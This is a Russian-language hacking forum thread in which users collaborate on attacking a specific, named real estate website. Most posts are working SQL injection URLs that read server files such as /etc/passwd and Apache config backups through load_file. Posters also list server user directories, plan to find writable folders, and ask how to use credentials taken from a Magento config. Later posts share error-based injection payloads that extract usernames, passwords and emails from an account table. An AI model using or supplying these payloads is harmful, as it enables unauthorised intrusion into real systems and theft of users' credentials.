08.06.2015, 17:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от huntercs16
↑
Код:
http://5788sagebrookdrive.com/property-details?mls=-1'+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a),1+)+--+;&src=1
Как узнать где сайт лежит?
|
|
|
08.06.2015, 18:14
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
|
|
|
|
08.06.2015, 18:34
|
|
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами:
6630806
Репутация:
6
|
|
Все хорошо, но
Код:
_SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
----------
спасибо на этом хотя бы
|
|
|
|
08.06.2015, 18:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от huntercs16
↑
Все хорошо, но
Код:
_SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
радость-то какая, наконец-то могу пощупать эту фишку freebsd:
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
т. е. при чтении директории получаете список файлов и папок
директория /home/lwdhost/
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
почему такая ерунда с папками? в httpd прописаны алиасы:
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1
Код:
addisonklein
advancedlabs
brian
brian1
cameron
canon-copier
coldwellca
cortexx
dns
formbuilder
grijalva
impact
jennie
jira
lwdhost
mayer
mlsimages
olyins
outgoing
pcmls
puddlejumpers
riverbendranch
ryanm
steve1
tara
theofficialjeff
tyler
unixsa
vera
koliopoulos
gsmls
MPS.httpd.conf.bk25oct2010
MPS.php.ini.bk25oct2010
VPS.httpd.conf.bk25oct2010
VPS.php.ini.bk25oct2010
нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
|
|
|
|
09.06.2015, 00:00
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:
.SpoilerTarget" type="button">Spoiler: code
*password*
Что она означает? и как можно подключиться по этим данным?
|
|
|
|
09.06.2015, 00:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Br@!ns
↑
в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:
Spoiler: code
*password*
Что она означает? и как можно подключиться по этим данным?
Похоже на Redis Cache, в нете туториалы есть )
|
|
|
|
11.06.2015, 12:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
|
|
|
|
11.06.2015, 13:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от rumbln
↑
Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
SELECT * FROM таблица_с_юзерами WHERE id = 6010.
в ответе получите все данные по пользователю и узнаете имя колонки
|
|
|
|
11.06.2015, 16:40
|
|
Новичок
Регистрация: 16.12.2013
Сообщений: 6
С нами:
6530006
Репутация:
0
|
|
Хелп плз
при попытке выполнить 25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1появляется ошибка Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции ExtractValue.Какие есть альтернативы?
P.S.
25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
|
|
|
|
11.06.2015, 16:51
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от AndreyBerkut
↑
Хелп плз
при попытке выполнить
25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1
появляется ошибка
Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции
ExtractValue.
Какие есть альтернативы?
P.S.
25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(version(), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
По по воду версий https://dev.mysql.com/doc/refman/5.1...functions.html.
Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
